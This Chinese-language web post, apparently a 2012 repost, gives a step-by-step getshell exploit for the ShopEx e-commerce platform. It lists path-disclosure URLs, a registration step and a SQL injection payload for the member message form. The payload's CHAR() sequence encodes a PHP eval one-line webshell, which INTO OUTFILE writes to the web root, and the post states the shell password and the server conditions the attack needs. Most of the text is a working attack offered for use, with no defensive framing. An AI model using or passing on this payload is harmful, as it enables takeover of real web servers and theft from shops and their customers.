您的位置:首页 > 运维架构 > Shell

shopex前台普通用户getshell最新漏洞

2012-11-08 22:10 1051 查看
第一个:想办法找到目标网站的绝对路径
http://www.baidu.com/install/svinfo.php?phpinfo=true http://www.baidu.com/core/api/shop_api.php http://www.baidu.com/core/api/site/2.0/api_b2b_2_0_cat.php http://www.baidu.com/core/api/site/2.0/api_b2b_2_0_goodstype.php http://www.baidu.com/core/api/site/2.0/api_b2b_2_0_brand.php
shopex存在很多爆路径的漏洞,请自行研究。

第二个:注册一个普通用户
http://www.baidu.com/?passport-signup.html
第三个: 发送消息
http://www.baidu.com/?member-send.html




代码
webshell.cc' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #


一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

shell图



内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: